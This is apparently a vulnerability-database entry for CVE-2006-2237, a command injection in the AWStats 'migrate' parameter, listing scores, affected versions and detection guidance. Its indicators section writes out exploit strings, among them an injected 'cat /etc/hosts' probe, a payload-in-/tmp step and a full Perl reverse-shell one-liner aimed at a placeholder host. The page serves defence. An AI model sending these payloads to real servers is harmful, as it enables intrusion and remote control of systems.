cbcvebase.
CVE-2006-2237
published 2006-05-08

CVE-2006-2237: The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in…

PriorityP272medium5.1CVSS 2.0
AVNACHAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
58.36%
99.0th percentile
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.

Affected

7 ranges
VendorProductVersion rangeFixed in
awstatsawstats
awstatsawstats
awstatsawstats>= 0 < 6.5-26.5-2
awstatsawstats>= 0 < 6.5-26.5-2
awstatsawstats>= 0 < 6.5-26.5-2
awstatsawstats>= 0 < 6.5-26.5-2
debianawstats< awstats 6.5-2 (bookworm)awstats 6.5-2 (bookworm)

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/awstats.pl
command|echo;cat /etc/hosts;echo|awstats<rand>.demo.txt
command|cd /tmp/ && <payload>|awstats052005.<host>.txt
commandcd /tmp &&<payload>
url?migrate=|echo;echo%20YYY;<command>;echo%20YYY;echo|awstats<rand>.<site>.txt
commandperl -e '$h="<host>";$p=<port>;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };'
path/tmp/
  • Detect exploitation attempts by monitoring HTTP requests to awstats.pl containing shell metacharacters (pipe '|') in the 'migrate' CGI parameter, especially patterns matching |...|awstats*.txt
  • Alert on HTTP GET requests to /cgi-bin/awstats.pl where the 'migrate' query parameter contains a pipe character followed by commands and ends with a pattern like awstats<digits>.<site>.txt
  • Monitor for the distinctive User-Agent string '[BL4CK] Security' in HTTP requests, which is used by the public exploit PoC for this CVE
  • Monitor for the Referer header value 'http://exploit.by.redsand.of.blacksecurity.org' in requests to awstats.pl, used by the public PoC exploit
  • Detect check/probe requests where the migrate parameter contains 'cat /etc/hosts', used by the Metasploit module's check() function to fingerprint vulnerable targets
  • Monitor for outbound Perl-based reverse shell connections (connect-back) from the web server process, particularly using Socket module with fork+exec /bin/sh pattern
  • The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats config; audit configurations and restrict access to the update functionality as a detection/hardening measure
  • ·The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file, which is a non-default setting. Installations that only build static pages are not affected.
  • ·Static AWStats deployments (those not using the web-based update feature) are not vulnerable to this CVE.
  • ·Affected versions are AWStats 6.4 and 6.5 only; the fix was introduced in 6.6 (Debian fixed in package version 6.5-2).

CVSS provenance

nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
osv5.1MEDIUM
vulncheck5.1MEDIUM
vendor_debian5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.